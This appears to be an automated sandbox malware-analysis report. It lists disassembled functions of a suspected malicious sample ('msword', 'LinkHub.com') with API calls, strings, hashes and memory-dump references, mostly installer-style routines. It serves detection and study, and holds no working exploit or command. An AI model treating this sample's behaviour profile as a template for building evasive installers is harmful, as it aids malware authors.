Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 0000000C.00000002.1837723218.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.1837704654.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837765400.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1837949685.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: LinkHub.comPID: 7700, Parent PID: 7832COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 00B05FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B05FF7

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

GetCurrentProcess.KERNEL32(?,00B9DC2C,00000000,?,?), ref: 00B06123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00B0612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B06155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B06167
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B06175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00B0617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00B061A1

Strings

|O, xrefs: 00B450F7
GetNativeSystemInfo, xrefs: 00B06161
kernel32.dll, xrefs: 00B06150

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: b043461a75ac611fb08f950fc800eb71972b1f70ad03f768eaf2e99e9eb9b348
Instruction ID: 0d59663ea006b0cda6d2861b5034e0e5616fd2e29e0cdd2a989497ce0cd5ca0f
Opcode Fuzzy Hash: b043461a75ac611fb08f950fc800eb71972b1f70ad03f768eaf2e99e9eb9b348
Instruction Fuzzy Hash: BBA1933680B6D4CFC721CB687C91195BFE4AB36320B0858DBD484A7362EA6D4548EB7D

Function 00B0338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

